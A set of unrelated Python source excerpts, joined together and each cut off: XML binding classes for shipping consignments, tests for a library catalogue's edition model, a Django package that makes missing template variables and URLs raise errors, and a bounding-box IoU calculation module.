nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'consignmentNumber':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'consignmentNumber')
value_ = self.gds_validate_string(value_, node, 'consignmentNumber')
self.consignmentNumber = value_
self.consignmentNumber_nsprefix_ = child_.prefix
elif nodeName_ == 'customerReference':
value_ = child_.text
value_ = self.gds_parse_string(value_, node, 'customerReference')
value_ = self.gds_validate_string(value_, node, 'customerReference')
self.customerReference = value_
self.customerReference_nsprefix_ = child_.prefix
# end class consignmentIdentityType
class nameAndAddressRequestType(GeneratedsSuper):
"""Information relating to name and address for a participant
in the consignment.
Examples of a participant are:
The Sender - the company sending the consignment
The Receiver - the company receiving the consignment
The Collection Address - the address from which the consignment is picked
up
The Delivery Address - the address to which the consignment should be
delivered"""
__hash__ = GeneratedsSuper.__hash__
subclass = None
superclass = None
def __init__(self, name=None, addressLine1=None, addressLine2=None, addressLine3=None, town=None, exactMatch='Y', province=None, postcode=None, country=None, gds_collector_=None, **kwargs_):
self.gds_collector_ = gds_collector_
self.gds_elementtree_node_ = None
self.original_tagname_ = None
self.parent_object_ = kwargs_.get('parent_object_')
self.ns_prefix_ = None
self.name = name
self.validate_stringMaxLength40(self.name)
self.name_nsprefix_ = None
self.addressLine1 = addressLine1
self.validate_stringMaxLength30(self.addressLine1)
self.addressLine1_nsprefix_ = None
self.addressLine2 = addressLine2
self.validate_stringMaxLength30(self.addressLine2)
self.addressLine2_nsprefix_ = None
self.addressLine3 = addressLine3
self.validate_stringMaxLength30(self.addressLine3)
self.addressLine3_nsprefix_ = None
self.town = town
self.validate_stringMaxLength40(self.town)
self.town_nsprefix_ = None
self.exactMatch = exactMatch
self.validate_booleanEnum(self.exactMatch)
self.exactMatch_nsprefix_ = None
self.province = province
self.validate_stringMaxLength30(self.province)
self.province_nsprefix_ = None
self.postcode = postcode
self.validate_stringMaxLength9(self.postcode)
self.postcode_nsprefix_ = None
self.country = country
self.validate_stringMinLength2MaxLength2(self.country)
self.country_nsprefix_ = None
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, nameAndAddressRequestType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if nameAndAddressRequestType.subclass:
return nameAndAddressRequestType.subclass(*args_, **kwargs_)
else:
return nameAndAddressRequestType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ns_prefix_(self):
return self.ns_prefix_
def set_ns_prefix_(self, ns_prefix):
self.ns_prefix_ = ns_prefix
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_addressLine1(self):
return self.addressLine1
def set_addressLine1(self, addressLine1):
self.addressLine1 = addressLine1
def get_addressLine2(self):
return self.addressLine2
def set_addressLine2(self, addressLine2):
self.addressLine2 = addressLine2
def get_addressLine3(self):
return self.addressLine3
def set_addressLine3(self, addressLine3):
self.addressLine3 = addressLine3
def get_town(self):
return self.town
def set_town(self, town):
self.town = town
def get_exactMatch(self):
return self.exactMatch
def set_exactMatch(self, exactMatch):
self.exactMatch = exactMatch
def get_province(self):
return self.province
def set_province(self, province):
self.province = province
def get_postcode(self):
return self.postcode
def set_postcode(self, postcode):
self.postcode = postcode
def get_country(self):
return self.country
def set_country(self, country):
self.country = country
def validate_stringMaxLength40(self, value):
result = True
# Validate type stringMaxLength40, a restriction on xsd:string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
if len(value) > | |
# encoding: utf-8
import datetime
from ...testing import DatabaseTest
from ...model import (
get_one_or_create,
PresentationCalculationPolicy,
)
from ...model.constants import MediaTypes
from ...model.coverage import CoverageRecord
from ...model.contributor import Contributor
from ...model.datasource import DataSource
from ...model.edition import Edition
from ...model.identifier import Identifier
from ...model.licensing import DeliveryMechanism
from ...model.resource import (
Hyperlink,
Representation,
)
class TestEdition(DatabaseTest):
def test_medium_from_media_type(self):
# Verify that we can guess a value for Edition.medium from a
# media type.
m = Edition.medium_from_media_type
for audio_type in MediaTypes.AUDIOBOOK_MEDIA_TYPES:
assert Edition.AUDIO_MEDIUM == m(audio_type)
assert Edition.AUDIO_MEDIUM == m(audio_type + ";param=value")
for book_type in MediaTypes.BOOK_MEDIA_TYPES:
assert Edition.BOOK_MEDIUM == m(book_type)
assert Edition.BOOK_MEDIUM == m(book_type + ";param=value")
assert Edition.BOOK_MEDIUM == m(DeliveryMechanism.ADOBE_DRM)
def test_license_pools(self):
# Here are two collections that provide access to the same book.
c1 = self._collection()
c2 = self._collection()
edition, lp1 = self._edition(with_license_pool=True)
lp2 = self._licensepool(edition=edition, collection=c2)
# Two LicensePools for the same work.
assert lp1.identifier == lp2.identifier
# Edition.license_pools contains both.
assert set([lp1, lp2]) == set(edition.license_pools)
def test_author_contributors(self):
data_source = DataSource.lookup(self._db, DataSource.GUTENBERG)
id = self._str
type = Identifier.GUTENBERG_ID
edition, was_new = Edition.for_foreign_id(
self._db, data_source, type, id
)
# We've listed the same person as primary author and author.
[alice], ignore = Contributor.lookup(self._db, "<NAME>")
edition.add_contributor(
alice, [Contributor.AUTHOR_ROLE, Contributor.PRIMARY_AUTHOR_ROLE]
)
# We've listed a different person as illustrator.
[bob], ignore = Contributor.lookup(self._db, "Bitshifter, Bob")
edition.add_contributor(bob, [Contributor.ILLUSTRATOR_ROLE])
# Both contributors show up in .contributors.
assert set([alice, bob]) == edition.contributors
# Only the author shows up in .author_contributors, and she
# only shows up once.
assert [alice] == edition.author_contributors
def test_for_foreign_id(self):
"""Verify we can get a data source's view of a foreign id."""
data_source = DataSource.lookup(self._db, DataSource.GUTENBERG)
id = "549"
type = Identifier.GUTENBERG_ID
record, was_new = Edition.for_foreign_id(
self._db, data_source, type, id)
assert data_source == record.data_source
identifier = record.primary_identifier
assert id == identifier.identifier
assert type == identifier.type
assert True == was_new
assert [identifier] == record.equivalent_identifiers()
# We can get the same work record by providing only the name
# of the data source.
record, was_new = Edition.for_foreign_id(
self._db, DataSource.GUTENBERG, type, id)
assert data_source == record.data_source
assert identifier == record.primary_identifier
assert False == was_new
def test_missing_coverage_from(self):
gutenberg = DataSource.lookup(self._db, DataSource.GUTENBERG)
oclc = DataSource.lookup(self._db, DataSource.OCLC)
web = DataSource.lookup(self._db, DataSource.WEB)
# Here are two Gutenberg records.
g1, ignore = Edition.for_foreign_id(
self._db, gutenberg, Identifier.GUTENBERG_ID, "1")
g2, ignore = Edition.for_foreign_id(
self._db, gutenberg, Identifier.GUTENBERG_ID, "2")
# One of them has coverage from OCLC Classify
c1 = self._coverage_record(g1, oclc)
# The other has coverage from a specific operation on OCLC Classify
c2 = self._coverage_record(g2, oclc, "some operation")
# Here's a web record, just sitting there.
w, ignore = Edition.for_foreign_id(
self._db, web, Identifier.URI, "http://www.foo.com/")
# missing_coverage_from picks up the Gutenberg record with no
# coverage from OCLC. It doesn't pick up the other
# Gutenberg record, and it doesn't pick up the web record.
[in_gutenberg_but_not_in_oclc] = Edition.missing_coverage_from(
self._db, gutenberg, oclc).all()
assert g2 == in_gutenberg_but_not_in_oclc
# If we ask about a specific operation, we get the Gutenberg
# record that has coverage for that operation, but not the one
# that has generic OCLC coverage.
[has_generic_coverage_only] = Edition.missing_coverage_from(
self._db, gutenberg, oclc, "some operation").all()
assert g1 == has_generic_coverage_only
# We don't put web sites into OCLC, so this will pick up the
# web record (but not the Gutenberg record).
[in_web_but_not_in_oclc] = Edition.missing_coverage_from(
self._db, web, oclc).all()
assert w == in_web_but_not_in_oclc
# We don't use the web as a source of coverage, so this will
# return both Gutenberg records (but not the web record).
assert [g1.id, g2.id] == sorted([x.id for x in Edition.missing_coverage_from(
self._db, gutenberg, web)])
def test_sort_by_priority(self):
# Make editions created by the license source, the metadata
# wrangler, and library staff.
admin = self._edition(data_source_name=DataSource.LIBRARY_STAFF, with_license_pool=False)
od = self._edition(data_source_name=DataSource.OVERDRIVE, with_license_pool=False)
mw = self._edition(data_source_name=DataSource.METADATA_WRANGLER, with_license_pool=False)
# Create an invalid edition with no data source. (This shouldn't
# happen.)
no_data_source = self._edition(with_license_pool=False)
no_data_source.data_source = None
def ids(l):
return [x for x in l]
# The invalid edition is the lowest priority. The admin
# interface and metadata wrangler take precedence over any
# other data sources.
expect = [no_data_source, od, mw, admin]
actual = Edition.sort_by_priority(expect)
assert ids(expect) == ids(actual)
# If you specify which data source is associated with the
# license for the book, you will boost its priority above that
# of the metadata wrangler.
expect = [no_data_source, mw, od, admin]
actual = Edition.sort_by_priority(expect, od.data_source)
assert ids(expect) == ids(actual)
def test_equivalent_identifiers(self):
edition = self._edition()
identifier = self._identifier()
data_source = DataSource.lookup(self._db, DataSource.OCLC)
identifier.equivalent_to(data_source, edition.primary_identifier, 0.6)
policy = PresentationCalculationPolicy(
equivalent_identifier_threshold=0.5
)
assert (set([identifier, edition.primary_identifier]) ==
set(edition.equivalent_identifiers(policy=policy)))
policy.equivalent_identifier_threshold = 0.7
assert (set([edition.primary_identifier]) ==
set(edition.equivalent_identifiers(policy=policy)))
def test_recursive_edition_equivalence(self):
# Here's a Edition for a Project Gutenberg text.
gutenberg, gutenberg_pool = self._edition(
data_source_name=DataSource.GUTENBERG,
identifier_type=Identifier.GUTENBERG_ID,
identifier_id="1",
with_open_access_download=True,
title="Original Gutenberg text")
# Here's a Edition for an Open Library text.
open_library, open_library_pool = self._edition(
data_source_name=DataSource.OPEN_LIBRARY,
identifier_type=Identifier.OPEN_LIBRARY_ID,
identifier_id="W1111",
with_open_access_download=True,
title="Open Library record")
# We've learned from OCLC Classify that the Gutenberg text is
# equivalent to a certain OCLC Number. We've learned from OCLC
# Linked Data that the Open Library text is equivalent to the
# same OCLC Number.
oclc_classify = DataSource.lookup(self._db, DataSource.OCLC)
oclc_linked_data = DataSource.lookup(self._db, DataSource.OCLC_LINKED_DATA)
oclc_number, ignore = Identifier.for_foreign_id(
self._db, Identifier.OCLC_NUMBER, "22")
gutenberg.primary_identifier.equivalent_to(
oclc_classify, oclc_number, 1)
open_library.primary_identifier.equivalent_to(
oclc_linked_data, oclc_number, 1)
# Here's a Edition for a Recovering the Classics cover.
web_source = DataSource.lookup(self._db, DataSource.WEB)
recovering, ignore = Edition.for_foreign_id(
self._db, web_source, Identifier.URI,
"http://recoveringtheclassics.com/pride-and-prejudice.jpg")
recovering.title = "Recovering the Classics cover"
# We've manually associated that Edition's URI directly
# with the Project Gutenberg text.
manual = DataSource.lookup(self._db, DataSource.MANUAL)
gutenberg.primary_identifier.equivalent_to(
manual, recovering.primary_identifier, 1)
# Finally, here's a completely unrelated Edition, which
# will not be showing up.
gutenberg2, gutenberg2_pool = self._edition(
data_source_name=DataSource.GUTENBERG,
identifier_type=Identifier.GUTENBERG_ID,
identifier_id="2",
with_open_access_download=True,
title="Unrelated Gutenberg record.")
# When we call equivalent_editions on the Project Gutenberg
# Edition, we get three Editions: the Gutenberg record
# itself, the Open Library record, and the Recovering the
# Classics record.
#
# We get the Open Library record because it's associated with
# the same OCLC Number as the Gutenberg record. We get the
# Recovering the Classics record because it's associated
# directly with the Gutenberg record.
results = list(gutenberg.equivalent_editions())
assert 3 == len(results)
assert gutenberg in results
assert open_library in results
assert recovering in results
# Here's a Work that incorporates one of the Gutenberg records.
work = self._work()
work.license_pools.extend([gutenberg2_pool])
# Its set-of-all-editions contains only one record.
assert 1 == work.all_editions().count()
# If we add the other Gutenberg record to it, then its
# set-of-all-editions is extended by that record, *plus*
# all the Editions equivalent to that record.
work.license_pools.extend([gutenberg_pool])
assert 4 == work.all_editions().count()
def test_calculate_presentation_title(self):
wr = self._edition(title="The Foo")
wr.calculate_presentation()
assert "Foo, The" == wr.sort_title
wr = self._edition(title="A Foo")
wr.calculate_presentation()
assert "Foo, A" == wr.sort_title
def test_calculate_presentation_missing_author(self):
wr = self._edition()
self._db.delete(wr.contributions[0])
self._db.commit()
wr.calculate_presentation()
assert u"[Unknown]" == wr.sort_author
assert u"[Unknown]" == wr.author
def test_calculate_presentation_author(self):
bob, ignore = self._contributor(sort_name="Bitshifter, Bob")
wr = self._edition(authors=bob.sort_name)
wr.calculate_presentation()
assert "<NAME>" == wr.author
assert "Bitshifter, Bob" == wr.sort_author
bob.display_name="<NAME>"
wr.calculate_presentation()
assert "<NAME>. Bitshifter" == wr.author
assert "Bitshifter, Bob" == wr.sort_author
kelly, ignore = self._contributor(sort_name="Accumulator, Kelly")
wr.add_contributor(kelly, Contributor.AUTHOR_ROLE)
wr.calculate_presentation()
assert "Kelly Accumulator, <NAME>" == wr.author
assert "Accumulator, Kelly ; Bitshifter, Bob" == wr.sort_author
def test_set_summary(self):
e, pool = self._edition(with_license_pool=True)
work = self._work(presentation_edition=e)
overdrive = DataSource.lookup(self._db, DataSource.OVERDRIVE)
# Set the work's summmary.
l1, new = pool.add_link(Hyperlink.DESCRIPTION, None, overdrive, "text/plain",
"F")
work.set_summary(l1.resource)
assert l1.resource == work.summary
assert "F" == work.summary_text
# Remove the summary.
work.set_summary(None)
assert None == work.summary
assert "" == work.summary_text
def test_calculate_evaluate_summary_quality_with_privileged_data_sources(self):
e, pool = self._edition(with_license_pool=True)
oclc = DataSource.lookup(self._db, DataSource.OCLC_LINKED_DATA)
overdrive = DataSource.lookup(self._db, DataSource.OVERDRIVE)
# There's a perfunctory description from Overdrive.
l1, new = pool.add_link(Hyperlink.SHORT_DESCRIPTION, None, overdrive, "text/plain",
"F")
overdrive_resource = l1.resource
# There's a much better description from OCLC Linked Data.
l2, new = pool.add_link(Hyperlink.DESCRIPTION, None, oclc, "text/plain",
"""Nothing about working with his former high school crush, <NAME>, is ideal. Still, if <NAME> intends to save his grandmother's bakery, he must. Good thing he has a lot of ideas he can't wait to implement. He never imagines Stephanie would have her own ideas for | |
the ELSE nodelist was the one which was rendered, whilst
# still collecting the individual conditions that made up all the if components
# to check which ones failed with a MissingVariable exception rather than just
# evaluating falsy...
conditions_seen = set() # type: Set[TemplateLiteral]
conditions = [] # type: List[TemplateLiteral]
def extract_first_second_from_branch(_cond):
# type: (Any) -> Iterator[TemplateLiteral]
first = getattr(_cond, "first", None)
second = getattr(_cond, "second", None)
if first is not None and first:
for subcond in extract_first_second_from_branch(first):
yield subcond
if second is not None and second:
for subcond in extract_first_second_from_branch(second):
yield subcond
if first is None and second is None:
yield _cond
for index, condition_nodelist in enumerate(self.conditions_nodelists, start=1):
condition, nodelist = condition_nodelist
if condition is not None:
for _cond in extract_first_second_from_branch(condition):
if _cond not in conditions_seen:
conditions.append(_cond)
conditions_seen.add(_cond)
for condition in conditions:
if hasattr(condition, "value") and hasattr(condition.value, "resolve"):
condition.value.resolve(context)
return old_if_render(self, context)
URL_BLACKLIST = (
# Admin login
("admin_password_reset", "password_reset_url"),
# Admin header (every page)
("django-admindocs-docroot", "docsroot"),
) # type: Tuple[Tuple[Text, Text], ...]
def url_blacklist():
# type: () -> Tuple[Tuple[Text, Text], ...]
# TODO: make this memoized/cached?
return URL_BLACKLIST + tuple(getattr(settings, "SHOUTY_URL_BLACKLIST", ()))
def new_url_render(self, context):
# type: (URLNode, Any) -> Any
"""
Call the original render method, and if it returns nothing AND has been
put into the context, raise an exception.
eg:
{% url '...' %} is fine. Will raise NoReverseMatch anyway.
{% url '...' as x %} is fine if ... resolves.
{% url '...' as x %} will now blow up if ... doesn't put something sensible
into the context (it should've thrown a NoReverseMatch)
"""
__traceback_hide__ = settings.DEBUG
value = old_url_render(self, context)
outvar = self.asvar
if outvar is not None and context[outvar] == "":
key = (str(self.view_name.var), str(outvar))
if key not in url_blacklist():
try:
(
template_name,
exc_info,
all_template_names,
) = create_exception_with_template_debug(context, outvar, self)
except Exception as e2:
logger.warning(
"failed to create template_debug information", exc_info=e2
)
# In case my code is terrible, and raises an exception, let's
# just carry on and let Django try for itself to set up relevant
# debug info
template_name = UNKNOWN_SOURCE
all_template_names = [template_name]
exc_info = {}
msg = "{{% url {token!s} ... as {asvar!s} %}} in template '{template} did not resolve.\nYou may silence this globally by adding {key!r} to settings.SHOUTY_URL_BLACKLIST".format(
token=self.view_name,
asvar=outvar,
key=key,
template=template_name,
)
exc = MissingVariable(
msg,
token=key,
template_name=template_name,
all_template_names=all_template_names,
)
if context.template.engine.debug and exc_info is not None:
exc_info["message"] = msg
exc.template_debug = exc_info
raise exc
return value
def patch(invalid_variables, invalid_urls):
# type: (bool, bool) -> bool
"""
Monkeypatch the Django Template Language's Variable class, replacing
the `_resolve_lookup` method with `new_resolve_lookup` in this module.
Also allows for turning on loud errors if using `{% url ... as outvar %}`
where the url resolved to nothing.
Calling it multiple times should be a no-op
"""
if not settings.DEBUG:
return False
if invalid_variables is True:
patched_var = getattr(Variable, "_shouty", False)
if patched_var is False:
Variable._resolve_lookup = new_resolve_lookup
Variable._shouty = True
# Provides exhaustive if/elif/else checking as well as all conditional
# in context checking ...
patched_if = getattr(IfNode, "_shouty", False)
if patched_if is False:
IfNode.render = new_if_render
IfNode._shouty = True
if invalid_urls is True:
patched_url = getattr(URLNode, "_shouty", False)
if patched_url is False:
URLNode.render = new_url_render
URLNode._shouty = True
return True
def check_user_blacklists(app_configs, **kwargs):
# type: (Any, **Any) -> List[checks.Error]
errors = []
user_blacklist = getattr(settings, "SHOUTY_VARIABLE_BLACKLIST", ())
if hasattr(user_blacklist, "items") and callable(user_blacklist.items):
for var, templates in user_blacklist.items():
if force_text(var) != var:
errors.append(
checks.Error(
"Expected key {!r} to be a string".format(var),
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
if force_text(templates) == templates:
errors.append(
checks.Error(
"Key {} has it's list of templates as a string".format(var),
hint="Templates should be like: ('template.html', 'template2.html')",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
try:
template_count = len(templates)
except Exception:
errors.append(
checks.Error(
"Key {} has an unexpected templates defintion".format(var),
hint="The value for templates should be like: ('template.html', 'template2.html')",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
else:
if var == ANY_VARIABLE and template_count < 1:
errors.append(
checks.Error(
"Magic variable * has an unexpected templates defintion".format(
var
),
hint="Using * requires you to specify a specific template (or set of templates) to ignore",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
elif var == ANY_VARIABLE and ANY_TEMPLATE in templates:
errors.append(
checks.Error(
"Magic variable * has an unexpected templates defintion".format(
var
),
hint="Using * for both the variable and template isn't supported, use settings.SHOUTY_VARIABLES = False",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
elif template_count < 1:
errors.append(
checks.Error(
"Key {} has an unexpected templates defintion".format(var),
hint="There are no templates whitelisted, nor the magic '*' value",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
else:
if force_text(user_blacklist) == user_blacklist:
errors.append(
checks.Error(
"Setting appears to be a string",
hint="Should be a sequence or dictionary (eg: ['myvar', 'myvar2'])",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
try:
iter(user_blacklist)
except TypeError:
errors.append(
checks.Error(
"Setting doesn't appear to be a sequence",
hint="Should be a sequence or dictionary (eg: ['myvar', 'myvar2'])",
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
else:
for var in user_blacklist:
if force_text(var) != var:
errors.append(
checks.Error(
"Expected {!r} to be a string".format(var),
obj="settings.SHOUTY_VARIABLE_BLACKLIST",
)
)
return errors
class Shout(AppConfig): # type: ignore
"""
Applies the patch automatically if enabled.
If `shouty` or `shouty.Shout` is added to INSTALLED_APPS only.
"""
name = "shouty"
def ready(self):
# type: () -> bool
logger.info("Applying shouty templates patch")
checks.register(check_user_blacklists, checks.Tags.templates)
return patch(
invalid_variables=getattr(settings, "SHOUTY_VARIABLES", True),
invalid_urls=getattr(settings, "SHOUTY_URLS", True),
)
default_app_config = "shouty.Shout"
if __name__ == "__main__":
import os
try:
import coverage
except ImportError:
sys.stdout.write("coverage not installed\n")
cov = None
else:
sys.stdout.write("using coverage\n")
cov = coverage.Coverage(
include=["shouty.py"], branch=True, check_preimported=True
)
cov.start()
from unittest import skipIf
from contextlib import contextmanager
from django.test import TestCase, SimpleTestCase, override_settings
from django.test.runner import DiscoverRunner
from django.views.debug import ExceptionReporter
from django.test.client import RequestFactory
from django import setup as django_setup, VERSION as DJANGO_VERSION
from django.conf import settings as test_settings
from django.utils.functional import SimpleLazyObject
EXTRA_INSTALLED_APPS = () # type: Tuple[Text, ...]
try:
import admin_honeypot
if DJANGO_VERSION[0:2] > (1, 9):
EXTRA_INSTALLED_APPS += ("admin_honeypot",)
except ImportError:
pass
try:
import crispy_forms
EXTRA_INSTALLED_APPS += ("crispy_forms",)
except ImportError:
pass
def urlpatterns():
# type: () -> Tuple[Any, ...]
try:
from django.urls import re_path, include
except ImportError:
from django.conf.urls import url as re_path, include
from django.contrib import admin
patterns = () # type: Tuple[Any, ...]
if "admin_honeypot" in EXTRA_INSTALLED_APPS:
patterns += (re_path(r"^admin_honeypot/", include("admin_honeypot.urls")),)
patterns += (
re_path(r"^admin/doc/", include("django.contrib.admindocs.urls")),
re_path(r"^admin/", admin.site.urls),
)
return patterns
if DJANGO_VERSION[0:2] <= (1, 9):
version_specific_settings = {
"MIDDLEWARE_CLASSES": [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
}
else:
version_specific_settings = {
"MIDDLEWARE": [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
}
test_settings.configure(
DEBUG=True,
SECRET_KEY="test-test-test-test-test-test-test-test-test-test-test-test",
DATABASES={
"default": {"ENGINE": "django.db.backends.sqlite3", "NAME": ":memory:"}
},
INSTALLED_APPS=(
"django.contrib.contenttypes",
"django.contrib.auth",
"django.contrib.admin",
"django.contrib.admindocs",
"django.contrib.sessions",
"django.contrib.messages",
"shouty",
)
+ EXTRA_INSTALLED_APPS,
TEMPLATES=[
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": (
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"django.template.context_processors.request",
)
},
},
],
ROOT_URLCONF=SimpleLazyObject(urlpatterns),
SHOUTY_VARIABLES=True,
SHOUTY_URLS=True,
LOGGING={
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"console": {
"format": "[%(levelname)s] %(name)s -> %(funcName)s -> %(message)s"
}
},
"handlers": {
"console": {"class": "logging.StreamHandler", "formatter": "console"},
},
"root": {
"handlers": ["console"],
"level": "ERROR",
},
"loggers": {
"shouty": {
"handlers": ["console"],
"level": os.environ.get("SHOUTY_LOGGING", "WARNING").upper(),
"propagate": False,
},
"django.request": {
"handlers": ["console"],
"level": "ERROR",
"propagate": False,
},
},
},
**version_specific_settings
)
django_setup()
from django.template import Template, Context as CTX
from django.forms import IntegerField
from django.template.loader import render_to_string
class TMPL(Template): # type: ignore
def __init__(self, *args, **kwargs):
# type: (Any, Any) -> None
super(TMPL, self).__init__(*args, **kwargs)
self.engine.debug = True
class CustomAssertions(object):
def assertStatusCode(self, resp, value):
# type: (Any, int) -> None
if resp.status_code != value:
self.fail(
"Expected status code {}, response had code {}".format(
value, resp.status_code
)
)
@contextmanager
def assertRaisesWithTemplateDebug(
self, exception_type, exception_repr, debug_data
):
# type: (Type[Exception], Text, Dict[Text, Any]) -> Iterator[None]
try:
yield
except exception_type as exc:
self.assertIn(str(exception_repr), str(exc)) # type: ignore
req = RequestFactory().get("/")
reporter = ExceptionReporter(
request=req,
exc_type=exception_type,
exc_value=exc,
tb=None,
is_email=True,
)
traceback_data = reporter.get_traceback_data()
template_debug = traceback_data.get(
"template_info", {}
) # type: Dict[Text, Any]
if template_debug == {}: # type: ignore
self.fail(
"Missing template_debug attribute from {}".format(exc)
) # type: ignore
if not debug_data:
self.fail( # type: ignore
"No data provided to check against {}".format(template_debug)
)
expected = {}
| |
<filename>calc/iou.py
# coding = utf-8
import numpy as np
from colorama import init, Fore, Back, Style
"""
Summary:
IoU Calculate:
the IoU between Box_1 and Box_2:
F(x): if x < 0 , =0; else, =x;
IoU: F(max_top - min_bottom) * F(min_right - max_left)
max_top = max(Box_1_top_y, Box_2_top_y)
min_bottom = min(Box_1_bottom_y, Box_2_bottom_y)
min_right = min(Box_1_right_x, Box_2_right_x)
max_left = max(Box_1_left_x, Box_2_left_x)
base on different parameter , generate different way to calculate the max_top, min_bottom, min_right and
max_left
max_top
===
|
----|--
Box_1<---| | |--->min_right
| ----|-----------
IoU<---|--|////| |
max_left<---|--|////| |
| |////| |
--|---- |
| | |
| | |-----> Box_2
===| |
min_bottom----------------
"""
def __iou_chw(rect1, rect2):
"""
calculate the IoU between rect1 and rect2, use the [center_y, center_x, height, width]
:param rect1:
:param rect2:
:return:
"""
y1, x1, h1, w1 = rect1
y2, x2, h2, w2 = rect2
if (abs(x1 - x2) < ((w1 + w2) / 2.0)) and (abs(y1 - y2) < ((h1 + h2) / 2.0)):
left = max((x1 - (w1 / 2.0)), (x2 - (w2 / 2.0)))
upper = max((y1 - (h1 / 2.0)), (y2 - (h2 / 2.0)))
right = min((x1 + (w1 / 2.0)), (x2 + (w2 / 2.0)))
bottom = min((y1 + (h1 / 2.0)), (y2 + (h2 / 2.0)))
inter_w = abs(left - right)
inter_h = abs(upper - bottom)
inter_square = inter_w * inter_h
union_square = (w1 * h1) + (w2 * h2) - inter_square
iou = inter_square / union_square * 1.0
inter_rect = [(upper + bottom) * 0.5, (left + right) * 0.5, bottom - upper, right - left]
else:
iou = 0
inter_rect = [None, None, None, None]
pass
return iou, inter_rect
pass
def __to_chw(*rects, **options):
TP = options.pop('TP', False)
LHW = options.pop('LHW', False)
CHW = options.pop('CHW', False)
assert np.count_nonzero([TP, LHW, CHW]) == 1, \
'TP, LHW, CHW should have only one True, but {0}'.format(np.count_nonzero([TP, LHW, CHW]))
assert len(rects) >= 1, 'no input rect'
get = []
if TP:
[get.append([(i[0] + i[2]) * 0.5, (i[1] + i[3]) * 0.5, i[2] - i[0], i[3] - i[1]]) for i in rects]
return get
if LHW:
[get.append([i[0] + 0.5 * i[2], i[1] + 0.5 * i[3], i[2], i[3]]) for i in rects]
return get
if CHW:
return rects
pass
def calc_iou(*rects, **options):
"""
多个rects计算iou存在错误
计算一组rects的iou
:param rects: 一组rects
:param options:
:keyword TP : rects使用两点(左上, 右下)表示 [left_y, left_x, right_y, right_x]
:keyword LHW : rects使用左上与高宽表示 [left_y, left_x, height, width]
:keyword CHW : rects使用中心点与高宽表示 [center_y, center_x, height, width]
:return:
"""
# fixme:多个rects计算iou存在error
TP = options.pop('TP', False)
LHW = options.pop('LHW', False)
CHW = options.pop('CHW', False)
rects = __to_chw(*rects, TP=TP, LHW=LHW, CHW=CHW)
inter_rect = rects[0]
iou = None
for i in range(1, len(rects)):
iou, inter_rect_new = __iou_chw(inter_rect, rect2=rects[i])
if None in inter_rect_new:
return iou
else:
inter_rect = inter_rect_new
return iou
pass
"""
Implement calc_iou_matrix_thw:
base on center_y_x and height width, there is algorithm:
max_top: max(-0.5 * group1_h, group_2_y - 0.5 * group2_h)
min_bottom: min(0.5 * group1_h, group_2_y + 0.5 * group2_h)
min_right: min(0.5 * group1_w, group2_x + 0.5 * group2_w)
max_left: min(-0.5 * group1_w, group2_x - 0.5 * group2_w)
use[[center_y, center_x, height, width], ....] as an example:
in order to create the IoU matrix
we should create group1_Box_M IoU group2_Box_N
we make group1 data repeat n cross row
just like:
-0.5 * group1_h:
[[group1_box_1_top_y, ..n.., group1_box_1_top_y],
[group1_box_2_top_y, ..n.., group1_box_2_top_y],
:
m
:,
[group1_box_m_top_y, ..n.., group1_box_m_top_y],
]
we make group2 data repeat m cross col
and group2 just make more one process transpose
and then use the algorithm
get then max_top, min_bottom, min_right, max_left Matrix
and then make element which lower than zeros zeroed
finally generate a m x n IoU matrix
"""
def calc_iou_matrix_ohw(
group1,
group2,
group1_h_index=2,
group1_w_index=3,
group2_y_index=0,
group2_x_index=1,
group2_h_index=2,
group2_w_index=3
):
"""
this function is for standard group1 IoU random group2
which means that the box in the group1 have the same center_y_x, and group2 carry the data
[offset_y, offset_x, height, width], offset means the offset pixel to the standard box center
calculate the IoU matrix base on group1 and group2 which carry the parameter top_y, top_x, height and width
:param group1: [[height, width], ....] according to default group1_*_index
:param group2: [[offset_y, offset_x, height, width], ...] according to default group2_*_index
:param group1_h_index: parameter represent the index of h in group1
:param group1_w_index: parameter represent the index of 2 in group1
:param group2_y_index: parameter represent the index of y in group2
:param group2_x_index: parameter represent the index of x in group2
:param group2_h_index: parameter represent the index of h in group2
:param group2_w_index: parameter represent the index of w in group2
:return:
group1_box_0 iou group2_box_0, group1_box_0 iou group2_box_1, ..., group1_box_0 iou group2_box_(n - 1), group1_box_0 iou group2_box_n
, , , ,
group1_box_1 iou group2_box_0, ... , ..., ... , group1_box_1 iou group2_box_n
,
... ...
,
... ...
,
... ...
,
group1_box_m iou group2_box_0, ... , ..., ... , group1_box_m iou group2_box_n
"""
g_1_matrix = np.array(group1)
g_2_matrix = np.array(group2)
group_1_amount = len(g_1_matrix)
group_2_amount = len(g_2_matrix)
g_1_area_cross_row = (g_1_matrix[:, group1_h_index] * g_1_matrix[:, group1_w_index]).repeat(
